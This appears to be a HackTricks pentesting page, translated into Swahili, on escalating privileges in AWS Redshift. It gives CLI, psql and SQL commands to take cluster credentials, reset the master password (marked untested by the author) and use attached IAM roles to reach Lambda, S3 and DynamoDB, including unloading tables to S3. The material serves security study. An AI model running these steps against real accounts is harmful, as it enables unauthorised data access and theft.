AWS - Redshift Privesc

Reading time: 4 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Redshift

Kwa maelezo zaidi kuhusu RDS angalia:

AWS - Redshift Enum

redshift:DescribeClusters, redshift:GetClusterCredentials

Kwa ruhusa hizi unaweza kupata habari za makundi yote (ikiwemo jina na jina la mtumiaji wa kundi) na kupata akreditivu za kuweza kufikia:

bash
# Get creds
aws redshift get-cluster-credentials --db-user postgres --cluster-identifier redshift-cluster-1
# Connect, even if the password is a base64 string, that is the password
psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAM:<username>" -d template1 -p 5439

Athari Inayoweza Kutokea: Pata taarifa nyeti ndani ya hifadhidata.

redshift:DescribeClusters, redshift:GetClusterCredentialsWithIAM

Kwa ruhusa hizi unaweza kupata taarifa za makundi yote na kupata akreditivu za kuweza kuyafikia.
Kumbuka kwamba mtumiaji wa postgres atakuwa na ruhusa ambazo utambulisho wa IAM ulitumika kupata akreditivu hizo unazo.

bash
# Get creds
aws redshift get-cluster-credentials-with-iam --cluster-identifier redshift-cluster-1
# Connect, even if the password is a base64 string, that is the password
psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAMR:AWSReservedSSO_AdministratorAccess_4601154638985c45" -d template1 -p 5439

Athari Inayoweza Kutokea: Pata taarifa nyeti ndani ya hifadhidata.

redshift:DescribeClusters, redshift:ModifyCluster?

Inawezekana kubadilisha nenosiri la mkuu wa mtumiaji wa ndani wa postgres (redshit) kutoka aws cli (nadhani hizo ndizo ruhusa unazohitaji lakini sijazijaribu bado):

aws redshift modify-cluster –cluster-identifier <identifier-for-the cluster> –master-user-password ‘master-password’;

Madhara Yanayoweza Kutokea: Pata taarifa nyeti ndani ya hifadhidata.

Kufikia Huduma za Nje

warning

Ili kufikia rasilimali zote zifuatazo, utahitaji kueleza jukumu la kutumia. Klasta ya Redshift inaweza kuwa na orodha ya majukumu ya AWS ambayo unaweza kutumia ikiwa unajua ARN au unaweza tu kuweka "default" kutumia ile ya kawaida iliyotolewa.

Zaidi ya hayo, kama ilivyoelezwa hapa, Redshift pia inaruhusu kuunganisha majukumu (mradi tu jukumu la kwanza linaweza kuchukua jukumu la pili) ili kupata ufikiaji zaidi lakini kwa kuvitenga kwa alama ya koma: iam_role 'arn:aws:iam::123456789012:role/RoleA,arn:aws:iam::210987654321:role/RoleB';

Lambdas

Kama ilivyoelezwa katika https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html, inawezekana kuita kazi ya lambda kutoka redshift kwa kitu kama:

sql
CREATE EXTERNAL FUNCTION exfunc_sum2(INT,INT)
RETURNS INT
STABLE
LAMBDA 'lambda_function'
IAM_ROLE default;

S3

Kama ilivyoelezwa katika https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html, inawezekana kusoma na kuandika kwenye S3 buckets:

sql
# Read
copy table from 's3://<your-bucket-name>/load/key_prefix'
credentials 'aws_iam_role=arn:aws:iam::<aws-account-id>:role/<role-name>'
region '<region>'
options;

# Write
unload ('select * from venue')
to 's3://mybucket/tickit/unload/venue_'
iam_role default;

Dynamo

Kama ilivyoelezwa katika https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html, inawezekana kupata data kutoka dynamodb:

sql
copy favoritemovies
from 'dynamodb://ProductCatalog'
iam_role 'arn:aws:iam::0123456789012:role/MyRedshiftRole';

warning

Jedwali la Amazon DynamoDB linalotoa data lazima liundwe katika Mkoa mmoja wa AWS kama klasta yako isipokuwa utumie chaguo la REGION kubaini Mkoa wa AWS ambapo jedwali la Amazon DynamoDB lipo.

EMR

Check https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html

References

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks